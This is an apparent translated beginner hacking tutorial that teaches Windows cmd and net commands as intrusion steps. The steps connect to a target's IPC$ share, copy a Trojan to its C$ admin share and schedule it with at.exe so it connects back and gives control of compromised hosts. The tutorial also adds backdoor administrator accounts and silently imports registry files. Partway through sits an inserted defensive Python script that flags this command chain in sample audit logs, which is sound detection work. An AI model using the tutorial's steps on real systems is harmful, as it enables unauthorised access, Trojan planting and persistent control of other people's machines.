Source: http://www.hacker-cn.com/
Hello everyone, I am a newbie, a cainiao, and I hope to grow together with everyone. Next I will introduce my security knowledge.
Section 1
Network commands a cainiao needs
To learn about network intrusion, we must first learn some basic network commands. The so-called basic commands are actually the DOS-style commands of Windows 2000 and Windows XP. All of these commands are run through cmd.exe.
Concept:
(1) Difference between cmd in 2000/XP and MS-DOS in 98:
cmd.exe in Windows 2000/XP is not MS-DOS, but it can still execute many DOS commands, such as dir, cd, del, and so on!
(2) Difference between internal and external commands in CMD:
The internal commands of CMD are the commands that can be run directly in CMD, such as telnet, ftp, dir, cd, and so on; type help in CMD to view them. External commands are commands that cannot be run directly in CMD (for example, the commonly used nc): you must first change to the directory where nc is located, and only there can you run the nc command.
Practices:
(1) Common intrusion and protection commands:
net, telnet, at, copy, ftp, finger, del, and so on
Some common Net commands and examples:
(1) Command for establishing an IPC$ connection
net use \\IP\ipc$ "" /user:username
For example:
net use \\127.0.0.1\ipc$ 123456 /user:administrator
This command establishes an IPC$ connection to host 127.0.0.1 as user administrator with password 123456.
(2) Delete an IPC$ connection
net use \\IP\ipc$ /del
For example:
net use \\127.0.0.1\ipc$ /del
Deletes the IPC$ connection established with host 127.0.0.1.
(3) Start and stop services:
net start // list the services that are currently started
net start servicename
net stop servicename
For example:
net start telnet // start the Telnet service
net stop telnet // stop the Telnet service
(4) Enable and disable shares
net share ipc$ // enable the IPC$ default share
net share ipc$ /del // disable the IPC$ default share
net share c=c: // share the whole C drive
net share d /del // remove the full share of the D drive
(4) Hard disk mapping
net use z: \\IP\c$
For example:
net use z: \\127.0.0.1\c$ // map the C drive of 127.0.0.1 to drive Z on this machine.
Note: After the mapping succeeds, an extra drive Z appears in My Computer. In fact, Z is the C drive of 127.0.0.1!
net use z: /del // disconnect the mapping
Role in intrusion: after mapping the other party's hard disk, we can copy files directly onto it.
Prerequisite for success: an IPC$ connection to the other party must already be established.
(5) Remote file copy
copy e:\3389.exe \\127.0.0.1\c$ // copy the file 3389.exe from the local E drive to the root of the other system's C drive.
Role of copy in intrusion: copy local files to the target's disk.
Prerequisite for a successful copy: an IPC$ connection to the host must already be established.
(6) View the time of a remote system
net time \\IP
net time \\127.0.0.1 // view the local time of the remote host 127.0.0.1
Purpose: obtain the other party's time in preparation for planting a Trojan through a scheduled task.
(7) Remote program execution
at \\IP time program.exe
at \\127.0.0.1 12:00 c:\server.exe // have the host run, at 12:00 noon, the Trojan server.exe that we copied to the root of its C drive
Role in intrusion: in this way the Trojan server connects back to our Trojan client, so that we can control the compromised hosts ("broilers") through a graphical interface.
(8) Add an administrator account:
net user username 1234 /add // add a user named username with password 1234
net localgroup administrators username /add // add the user username to the Administrators group
Note: on some systems the name of the administrator group must be adjusted to the actual situation, but on 99.9% of systems the administrator group is still Administrators.
Change a user's password:
net user username 1234 // change the password of user username to 1234.
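Items (1) to (8) above are one chain: an IPC$ connection, a copy to an administrative share, a net time check, at.exe scheduling and, often, a new account added to Administrators. A defender looks for exactly this chain in process command-line auditing. The following detection script is an added example, not code from the original page or its author: it tags constructed sample audit lines (a simplified one-line key=value layout standing in for the "Process Command Line" field of Event ID 4688 or Sysmon Event 1; the layout, host names, user names, addresses and file names are all constructed) and scores each source host by how much of the chain it issued.

```python
import re

# Constructed sample audit records (not from the page): timestamp, source host,
# user and the full process command line, as Windows Event ID 4688 ("Process
# Command Line") or Sysmon Event 1 record them once command-line auditing is
# enabled. The one-line key=value layout is an assumption made here so that
# the example runs offline.
SAMPLE_LOG = r"""
2024-05-01T10:00:01 host=WS01 user=alice cmd=net use \\10.0.0.5\ipc$ "" /user:administrator
2024-05-01T10:00:09 host=WS01 user=alice cmd=copy e:\tool.exe \\10.0.0.5\c$
2024-05-01T10:00:15 host=WS01 user=alice cmd=net time \\10.0.0.5
2024-05-01T10:00:20 host=WS01 user=alice cmd=at \\10.0.0.5 12:00 c:\tool.exe
2024-05-01T10:01:00 host=WS02 user=bob cmd=net user helpdesk P@ss1 /add
2024-05-01T10:01:05 host=WS02 user=bob cmd=net localgroup administrators helpdesk /add
2024-05-01T10:02:00 host=WS03 user=carol cmd=dir c:\users
2024-05-01T10:02:30 host=WS03 user=carol cmd=net use z: \\fileserver\share
""".strip().splitlines()

RECORD_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$"
)

# A UNC host as it appears after "\\": an IP address or a NetBIOS/DNS name.
HOST = r"\\\\[\w.\-]+"

# Each rule mirrors one step of the command chain from the text. Tags are
# emitted in this order for a matching command line.
RULES = [
    ("ipc_connect",       re.compile(r"\bnet\s+use\s+" + HOST + r"\\ipc\$", re.I)),
    ("ipc_null_password", re.compile(r"\bnet\s+use\s+" + HOST + r'\\ipc\$\s+""', re.I)),
    ("admin_share_map",   re.compile(r"\bnet\s+use\s+[a-z]:\s+" + HOST + r"\\[a-z]\$", re.I)),
    ("admin_share_copy",  re.compile(r"\bcopy\s+\S+\s+" + HOST + r"\\[a-z]\$", re.I)),
    ("remote_time",       re.compile(r"\bnet\s+time\s+" + HOST, re.I)),
    ("remote_at",         re.compile(r"\bat\s+" + HOST + r"\s+\d{1,2}:\d{2}\s+\S+", re.I)),
    ("share_enable",      re.compile(r"\bnet\s+share\s+\S+=\w:", re.I)),
    ("user_add",          re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("admin_group_add",   re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
]


def parse_record(line):
    """Return the record fields as a dict, or None for a line that does not parse."""
    m = RECORD_RE.match(line.strip())
    return m.groupdict() if m else None


def tag_command(cmd):
    """Return the list of rule tags that match one process command line."""
    return [tag for tag, rx in RULES if rx.search(cmd)]


def assess(tags):
    """Severity for the set of tags seen from one source host."""
    tags = set(tags)
    # An IPC$ connection followed by staging over an admin share or at.exe
    # scheduling is the complete remote-execution chain from the text.
    if "ipc_connect" in tags and tags & {"admin_share_copy", "remote_at"}:
        return "high"
    if "admin_group_add" in tags:
        return "high"
    if tags & {"ipc_connect", "admin_share_map", "share_enable", "user_add"}:
        return "medium"
    return "low" if tags else "none"


def analyze(lines):
    """Group tagged commands by source host and score each host.

    Returns {host: {"tags": [first-seen order], "severity": str}} for every
    host that issued at least one tagged command; quiet hosts are omitted.
    """
    per_host = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        tags = tag_command(rec["cmd"])
        if not tags:
            continue
        seen = per_host.setdefault(rec["host"], [])
        for t in tags:
            if t not in seen:
                seen.append(t)
    return {h: {"tags": t, "severity": assess(t)} for h, t in per_host.items()}


if __name__ == "__main__":
    for host, result in analyze(SAMPLE_LOG).items():
        print(f"{host}: {result['severity']:6} {', '.join(result['tags'])}")
```

Run as a script it reports WS01 as high (the full IPC$, copy, net time, at chain), WS02 as high (an account added to Administrators) and nothing for WS03, whose net use to an ordinary share is legitimate. The rules key on administrative shares (the trailing $) and on the /add switch rather than on the bare program names, because net use and copy alone are far too common to alert on.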
(9) Remote host login _ telnet
telnet IP port
For example, telnet 127.0.0.1 1234 // connect to port 1234 of 127.0.0.1
(When the target host uses the default port 23, we do not need to add the port: telnet IP)
(10) File transfer command _ ftp
In fact, I personally think this is not very useful. After all, once you have the FTP password, why not use FlashFXP or CuteFTP for a graphical interactive session?
First, enter ftp in CMD.
Then enter: open IP port
For example, open 127.0.0.1 1234 // connect to port 1234 of 127.0.0.1
How to start the FTP service in Windows:
net start msftpsvc
(11) Viewing folder permissions _ cacls
cacls xiaod // view the permissions of the folder xiaod
Parameter description: F (full control), R (read), C (change), W (write), N (no access)
(12) Delete a file _ del
del is the command used to delete files.
First, change to the directory of the file you want to delete.
del xiaod.txt // delete the file xiaod.txt
del xiaod.txt /f // force-delete the file xiaod.txt (use this when the file cannot be deleted normally)
(13) finger command
finger is an information-gathering command. It is generally used when the other party has port 79 open.
finger -l user@computer
Parameter details: -l displays the information in long list format
user: the user whose information is requested
Prerequisite for success: the peer must have the TCP/IP protocol installed.
(14) File write command _ echo:
echo Hello > index.htm // overwrite the content of index.htm with "Hello"
echo Hello >> index.htm // append the content you want to index.htm
(15) Write a registry file _ regedit
regedit /s filename.reg // /s is the parameter that imports (writes) the .reg file silently, without a confirmation prompt
(16) Port mapping _ chgport
chgport 3=5 // map COM port 3 to COM port 5
chgport /d * // delete all port mappings
(17) Directory mapping _ subst
subst B: c:\winnt // when you access drive B, you are actually accessing the directory c:\winnt.
(18) View the accounts currently logged on:
query session // list the current sessions and their accounts
(19) Kicking a user off:
logoff id // note: the ID is the session ID shown by query session, not the user name.
(20) Send a message to a user or an intranet host.
net send hostname-or-IP message
For example, net send xiaod hello! or net send 127.0.0.1 hello!